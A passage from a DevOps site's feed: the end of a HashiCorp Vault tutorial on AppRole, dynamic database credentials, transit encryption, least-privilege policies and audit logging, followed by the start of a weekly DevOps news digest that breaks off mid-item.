        </h2><p>A common mistake: generate a long-lived token, paste it into an app&#39;s environment, and forget it exists. Now you have the same forever-credential problem one layer up. If that token leaks, it works until someone notices.</p>
<p>For machines, use <strong>AppRole</strong>. The app proves its identity with a <code>role_id</code> (think username, not very secret) and a <code>secret_id</code> (think password, short-lived and delivered separately), and gets back a token scoped to exactly what it needs.</p>
<pre><code class="hljs language-bash">vault auth <span class="hljs-built_in">enable</span> approle

<span class="hljs-comment"># Create a role for the payments service.</span>
vault write auth/approle/role/payments-api \
    token_policies=<span class="hljs-string">&quot;payments-api&quot;</span> \
    token_ttl=1h \
    token_max_ttl=4h \
    secret_id_ttl=24h \
    secret_id_num_uses=1

<span class="hljs-comment"># role_id is stable and tied to the role.</span>
vault <span class="hljs-built_in">read</span> auth/approle/role/payments-api/role-id
</code></pre><pre><code class="hljs language-text">Key        Value
---        -----
role_id    7b1c4e2a-9f3d-4a8e-b6c1-2d5f8e0a1b3c
</code></pre><p>The <code>secret_id</code> is the part that needs care. Generate it just before the app starts and hand it over once. With <code>secret_id_num_uses=1</code> it works exactly one time, so a leaked <code>secret_id</code> in a log is already useless.</p>
<pre><code class="hljs language-bash">vault write -f auth/approle/role/payments-api/secret-id
</code></pre><pre><code class="hljs language-text">Key                   Value
---                   -----
secret_id             d8a3...e91f
secret_id_accessor    4c2b...77a0
secret_id_ttl         24h
</code></pre><p>The app logs in with both and gets a short-lived token:</p>
<pre><code class="hljs language-bash">vault write auth/approle/login \
    role_id=<span class="hljs-string">&quot;7b1c4e2a-9f3d-4a8e-b6c1-2d5f8e0a1b3c&quot;</span> \
    secret_id=<span class="hljs-string">&quot;d8a3...e91f&quot;</span>
</code></pre><pre><code class="hljs language-text">Key                  Value
---                  -----
token                hvs.CAESI...
token_duration       1h
token_renewable      true
token_policies       [&quot;default&quot; &quot;payments-api&quot;]
</code></pre><p>That token dies in an hour unless the app renews it. The pattern that delivers the <code>secret_id</code> securely (a sidecar, a cloud instance identity, or Vault Agent) is its own topic, but the rule is simple: the <code>role_id</code> can live in config, the <code>secret_id</code> should be freshly minted and single-use.</p>
<h2 id="h2-dynamic-database-credentials" class="group relative scroll-mt-24">
        <a href="#h2-dynamic-database-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Dynamic database credentials
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-dynamic-database-credentials"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the feature that changes how you think about secrets. Instead of one shared database password that every service knows, Vault creates a brand new database user for each request, with a short TTL, and deletes it when the lease expires.</p>
<p>Enable the database engine and point it at PostgreSQL:</p>
<pre><code class="hljs language-bash">vault secrets <span class="hljs-built_in">enable</span> database

vault write database/config/orders-db \
    plugin_name=<span class="hljs-string">&quot;postgresql-database-plugin&quot;</span> \
    allowed_roles=<span class="hljs-string">&quot;orders-readonly&quot;</span> \
    connection_url=<span class="hljs-string">&quot;postgresql://{{username}}:{{password}}@db.internal:5432/orders?sslmode=require&quot;</span> \
    username=<span class="hljs-string">&quot;vault-admin&quot;</span> \
    password=<span class="hljs-string">&quot;<span class="hljs-variable">$ROOT_DB_PASSWORD</span>&quot;</span>
</code></pre><p>The <code>vault-admin</code> account is the only static credential, and it is a privileged account Vault uses to create and drop other users. Now define a role that says what a generated user is allowed to do:</p>
<pre><code class="hljs language-bash">vault write database/roles/orders-readonly \
    db_name=<span class="hljs-string">&quot;orders-db&quot;</span> \
    creation_statements=<span class="hljs-string">&quot;CREATE ROLE \&quot;{{name}}\&quot; WITH LOGIN PASSWORD &#x27;{{password}}&#x27; VALID UNTIL &#x27;{{expiration}}&#x27;; \
      GRANT SELECT ON ALL TABLES IN SCHEMA public TO \&quot;{{name}}\&quot;;&quot;</span> \
    default_ttl=<span class="hljs-string">&quot;1h&quot;</span> \
    max_ttl=<span class="hljs-string">&quot;24h&quot;</span>
</code></pre><p>Ask for credentials:</p>
<pre><code class="hljs language-bash">vault <span class="hljs-built_in">read</span> database/creds/orders-readonly
</code></pre><pre><code class="hljs language-text">Key                Value
---                -----
lease_id           database/creds/orders-readonly/Qm9iY...
lease_duration     1h
lease_renewable    true
password           A1a-9Zx2Kp4Lq7Rt0Vn3
username           v-approle-orders-rea-x7Qd2bN9
</code></pre><p>That <code>username</code> did not exist a second ago. Run the command again and you get a different user with a different password. Each service instance, each request if you want, gets its own credentials. When the lease ends, Vault runs the revocation statement and the user is gone from PostgreSQL.</p>
<p>Here is why this matters in numbers. A static password sits valid until a human rotates it, which in practice means months or years. A dynamic credential with a one-hour TTL is useless to an attacker an hour after it leaks.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;How long a leaked credential stays valid&quot;,&quot;unit&quot;:&quot;hours&quot;,&quot;caption&quot;:&quot;Static password assumes a generous 180-day rotation cycle (4320 hours); most teams rotate far less often. Dynamic creds use the 1h default_ttl from the role above.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Static shared password&quot;,&quot;value&quot;:4320,&quot;series&quot;:&quot;Static&quot;},{&quot;label&quot;:&quot;Vault dynamic credential&quot;,&quot;value&quot;:1,&quot;series&quot;:&quot;Dynamic&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;Static&quot;,&quot;color&quot;:&quot;#ef4444&quot;},{&quot;name&quot;:&quot;Dynamic&quot;,&quot;color&quot;:&quot;#10b981&quot;}]}"></div><p>The shrink in exposure window is the entire reason to run Vault. If you take one thing from this post, make it this section.</p>
<h2 id="h2-encryption-as-a-service-with-the-transit-engine" class="group relative scroll-mt-24">
        <a href="#h2-encryption-as-a-service-with-the-transit-engine" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Encryption as a service with the transit engine
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-encryption-as-a-service-with-the-transit-engine"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Sometimes you do not want to store a secret, you want to encrypt application data: a customer&#39;s tax ID, a token, a column in your database. The wrong move is to ship an AES key to every app and hope nobody loses it. The transit engine keeps the key inside Vault and exposes encrypt and decrypt operations. Your app sends plaintext and gets ciphertext back. It never sees the key.</p>
<pre><code class="hljs language-bash">vault secrets <span class="hljs-built_in">enable</span> transit
vault write -f transit/keys/orders-pii
</code></pre><p>Encrypt some data (transit takes base64 input):</p>
<pre><code class="hljs language-bash">vault write transit/encrypt/orders-pii \
    plaintext=$(<span class="hljs-built_in">echo</span> -n <span class="hljs-string">&quot;4111-1111-1111-1111&quot;</span> | <span class="hljs-built_in">base64</span>)
</code></pre><pre><code class="hljs language-text">Key            Value
---            -----
ciphertext     vault:v1:8SDd4HCQ9p7Hf2bxN0kZ...
key_version    1
</code></pre><p>Store <code>vault:v1:8SDd...</code> in your database. To read it back:</p>
<pre><code class="hljs language-bash">vault write transit/decrypt/orders-pii \
    ciphertext=<span class="hljs-string">&quot;vault:v1:8SDd4HCQ9p7Hf2bxN0kZ...&quot;</span>
</code></pre><pre><code class="hljs language-text">Key          Value
---          -----
plaintext    NDExMS0xMTExLTExMTEtMTExMQ==
</code></pre><p>Base64-decode that and you are back to the card number. The <code>v1</code> prefix is the key version, which means you can rotate the key with <code>vault write -f transit/keys/orders-pii/rotate</code> and old ciphertext still decrypts while new writes use the fresh key. No key ever leaves Vault, so an app compromise leaks data the app could already see, not the key that protects all of it.</p>
<h2 id="h2-least-privilege-policies-and-the-audit-log" class="group relative scroll-mt-24">
        <a href="#h2-least-privilege-policies-and-the-audit-log" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Least-privilege policies and the audit log
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-least-privilege-policies-and-the-audit-log"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Tokens are only as safe as the policy attached to them. The <code>payments-api</code> policy referenced earlier should grant exactly what the service needs and nothing more:</p>
<pre><code class="hljs language-hcl"><span class="hljs-comment"># payments-api.hcl</span>
<span class="hljs-comment"># Read dynamic DB creds for the orders database.</span>
path <span class="hljs-string">&quot;database/creds/orders-readonly&quot;</span> {
  capabilities = [<span class="hljs-string">&quot;read&quot;</span>]
}

<span class="hljs-comment"># Encrypt and decrypt PII, but not manage or export the key.</span>
path <span class="hljs-string">&quot;transit/encrypt/orders-pii&quot;</span> {
  capabilities = [<span class="hljs-string">&quot;update&quot;</span>]
}
path <span class="hljs-string">&quot;transit/decrypt/orders-pii&quot;</span> {
  capabilities = [<span class="hljs-string">&quot;update&quot;</span>]
}
</code></pre><pre><code class="hljs language-bash">vault policy write payments-api payments-api.hcl
</code></pre><p>Notice what is missing. No <code>database/creds/orders-admin</code>, no <code>transit/keys/*</code> management, no wildcard paths. If the payments token leaks, the attacker can read orders and decrypt PII for an hour, and that is the ceiling. When a request asks for something outside the policy, Vault refuses:</p>
<pre><code class="hljs language-text">$ vault read database/creds/orders-admin
Error reading database/creds/orders-admin: Error making API request.
URL: GET https://vault-1.internal:8200/v1/database/creds/orders-admin
Code: 403. Errors:
* 1 error occurred:
	* permission denied
</code></pre><p>Turn on the audit log before you put anything real in Vault. It records every request and response (secrets are HMAC&#39;d, not stored in clear) so you can answer &quot;who read this secret and when&quot; during an incident:</p>
<pre><code class="hljs language-bash">vault audit <span class="hljs-built_in">enable</span> file file_path=/var/log/vault/audit.log
</code></pre><p>And when you do have an incident, dynamic secrets give you a clean kill switch. Revoke every credential a database role ever issued in one command:</p>
<pre><code class="hljs language-bash">vault lease revoke -prefix database/creds/orders-readonly
</code></pre><pre><code class="hljs language-text">All revocation operations queued successfully!
</code></pre><p>Every dynamic user that role created gets dropped from the database. Try doing that with a shared password that lives in forty places.</p>
<h2 id="h2-where-to-go-next" class="group relative scroll-mt-24">
        <a href="#h2-where-to-go-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where to go next
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-to-go-next"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>You now have the shape of a real Vault setup: a sealed, persistent server; AppRole for machines; dynamic database credentials; transit for encryption; tight policies; and an audit trail. The static KV store is still there when you need it, but it should be the exception, not the default.</p>
<p>Concrete next steps:</p>
<ol>
<li><strong>Replace one static database password with a dynamic role this week.</strong> Pick a low-risk read-only service and cut over. Seeing credentials expire on their own is what makes the model click.</li>
<li><strong>Stand up a 3-node Raft cluster</strong>, not a single server. One Vault node is a single point of failure for every secret you own. Run <code>vault operator raft list-peers</code> to confirm the cluster.</li>
<li><strong>Deploy Vault Agent</strong> to handle AppRole login and token renewal so your apps read a rendered file or env var instead of calling the Vault API directly.</li>
<li><strong>Set short TTLs and test revocation.</strong> Run <code>vault lease revoke -prefix</code> against a staging role and confirm the users vanish from your database. Know the command works before you need it at 2am.</li>
<li><strong>Ship the audit log to your SIEM</strong> so secret access shows up next to the rest of your security telemetry.</li>
</ol>
<p>Start with step one. Turning a single forever-password into a one-hour credential is the smallest change that removes the largest class of secret leaks you have.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 26, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-26</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 22 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-26</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-introducing-project-navigator-from-ai-intent-to-optimized-deployment-on-red-hat-openshift-ai" class="group relative scroll-mt-24">
        <a href="#h3-introducing-project-navigator-from-ai-intent-to-optimized-deployment-on-red-hat-openshift-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing Project Navigator: From AI intent to optimized deployment on Red Hat OpenShift AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-project-navigator-from-ai-intent-to-optimized-deployment-on-red-hat-openshift-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>You&#39;ve picked a model. Maybe it&#39;s a 70 billion parameter large model because someone on the team saw it top a leaderboard. Now you need it running in production on your Red Hat OpenShift AI cluster. S</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/introducing-project-navigator-ai-intent-optimized-deployment-red-hat-openshift-ai"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-ray-serve-llm-on-gke-performance-without-losing-the-developer-experience" class="group relative scroll-mt-24">
        <a href="#h3-scaling-ray-serve-llm-on-gke-performance-without-losing-the-developer-experience" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling Ray Serve LLM on GKE: Performance without losing the developer experience
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scaling-ray-serve-llm-on-gke-performance-without-losing-the-developer-experience"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Developers looking for LLM inference and model serving often turn to Ray Serve, a scalable model serving library with developer-friendly, Python-native APIs built by Anyscale. Combined with Google Kub</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/containers-kubernetes/improving-ray-serve-llm-on-gke-throughput-latency/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-cloud-native-belongs-at-the-heart-of-agentic-ai-lessons-from-building-a-multi-agent-security-platform-on-kubernetes" class="group relative scroll-mt-24">
        <a href="#h3-why-cloud-native-belongs-at-the-heart-of-agentic-ai-lessons-from-building-a-multi-agent-security-platform-on-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why cloud native belongs at the heart of agentic AI: Lessons from building a multi-agent security platform on Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-cloud-native-belongs-at-the-heart-of-agentic-ai-lessons-from-building-a-multi-agent-security-platform-on-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In March, I gave a talk at KubeCon + CloudNativeCon Europe 2026 in Amsterdam. After the session, the same questions kept coming up on the CNCF Slack and in person: why build agentic AI on cloud...</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/17/why-cloud-native-belongs-at-the-heart-of-agentic-ai-lessons-from-building-a-multi-agent-security-platform-on-kubernetes/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cloud-native"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-expanding-care-passing-cks-can-now-extend-your-cka-certification" class="group relative scroll-mt-24">
        <a href="#h3-expanding-care-passing-cks-can-now-extend-your-cka-certification" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Expanding CARE: Passing CKS can now extend your CKA certification
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-expanding-care-passing-cks-can-now-extend-your-cka-certification"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A few months ago, CNCF introduced the CARE Program — Certification Advancement &amp; Recertification Experience — to make it easier for certified professionals to keep their credentials current as they co</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/17/expanding-care-passing-cks-can-now-extend-your-cka-certification/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-docker-content-trust-retirement-and-migration-guidance" class="group relative scroll-mt-24">
        <a href="#h3-docker-content-trust-retirement-and-migration-guidance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Docker Content Trust: Retirement and Migration Guidance
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-docker-content-trust-retirement-and-migration-guidance"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>TLDR: Docker Content Trust (DCT) and the Notary v1 service at notary.docker.io are being fully retired (first announced in July of 2025). This blog explains what is changing, who is affected, and how </p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/docker-content-trust-retirement-and-migration-guidance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-data-residency-to-digital-sovereignty-architectural-patterns-for-cloud-native-platforms" class="group relative scroll-mt-24">
        <a href="#h3-from-data-residency-to-digital-sovereignty-architectural-patterns-for-cloud-native-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From data residency to digital sovereignty: Architectural patterns for cloud native platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-data-residency-to-digital-sovereignty-architectural-patterns-for-cloud-native-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Over the past two years, digital sovereignty has evolved from a policy discussion into a practical platform engineering concern. The EU Data Act has been fully applicable since January 11, 2025. NIS-2</p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/16/from-data-residency-to-digital-sovereignty-architectural-patterns-for-cloud-native-platforms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-docker-joins-the-athena-coalition-a-cross-industry-collaboration-for-supply-chain-security" class="group relative scroll-mt-24">
        <a href="#h3-docker-joins-the-athena-coalition-a-cross-industry-collaboration-for-supply-chain-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Docker joins the Athena coalition: a cross-industry collaboration for supply chain security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-docker-joins-the-athena-coalition-a-cross-industry-collaboration-for-supply-chain-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The obvious takeaway from 2026&#39;s biggest incidents is that attackers are increasingly using AI to move fast. Docker&#39;s CISO, Mark Lechner, wrote about this shift and what every engineering team should </p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/docker-joins-the-athena-coalition-a-cross-industry-collaboration-for-supply-chain-security/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cicd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-aws-image-builder-plugin-for-teamcity" class="group relative scroll-mt-24">
        <a href="#h3-aws-image-builder-plugin-for-teamcity" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS Image Builder Plugin for TeamCity
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-aws-image-builder-plugin-for-teamcity"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Cloud build agents are one of those CI/CD features that feel almost magical when everything works well. Your TeamCity server can scale build capacity up when the queue gets busy, then wind it back dow</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/teamcity/2026/06/teamcity-aws-ami-builder/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harness-mcp-server-now-connects-google-antigravity-ide" class="group relative scroll-mt-24">
        <a href="#h3-harness-mcp-server-now-connects-google-antigravity-ide" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harness MCP Server Now Connects Google Antigravity IDE
